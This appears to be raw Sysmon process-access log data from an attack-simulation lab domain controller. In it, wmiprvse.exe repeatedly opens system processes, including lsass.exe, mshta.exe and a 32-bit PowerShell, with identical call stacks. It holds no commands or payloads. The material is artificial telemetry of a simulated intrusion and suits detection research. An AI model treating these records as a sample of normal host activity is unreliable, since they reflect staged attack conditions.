15:59:22.288{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024098Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.288{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024097Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.288{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024096Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.288{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024095Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.288{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024094Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.288{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024093Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.288{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024092Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.288{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024091Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.288{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024090Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.288{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024089Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.288{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024088Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.288{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024087Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.288{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024086Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.288{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024085Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.288{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024084Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5359-6008-4606-00000000A301}3316C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024083Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5359-6008-4506-00000000A301}420C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024082Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5359-6008-4406-00000000A301}7796C:\Windows\SysWOW64\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024081Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5359-6008-4306-00000000A301}4856C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024080Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5357-6008-3E06-00000000A301}6760C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024079Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 